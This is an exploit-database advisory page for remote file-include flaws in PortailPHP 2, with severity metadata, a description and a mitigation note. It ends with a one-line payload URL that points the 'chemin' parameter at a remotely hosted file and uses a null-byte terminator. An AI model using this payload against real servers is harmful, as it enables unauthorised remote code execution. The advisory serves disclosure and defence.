header-logo
Suggest Exploit
vendor:
PortailPHP
by:
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: PortailPHP
Affected Version From: PortailPHP 2
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Multiple remote file-include vulnerabilities in PortailPHP

PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Mitigation:

It is recommended to sanitize user-supplied input properly to prevent remote file-include vulnerabilities. Additionally, keeping the software up to date with the latest patches and versions can help mitigate such vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22381/info
  
PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
  
PortailPHP 2 is vulnerable to these issues; other versions may also be affected. 

http://www.example.com/mod_news/index.php?chemin=http://site.com/file.txt?%00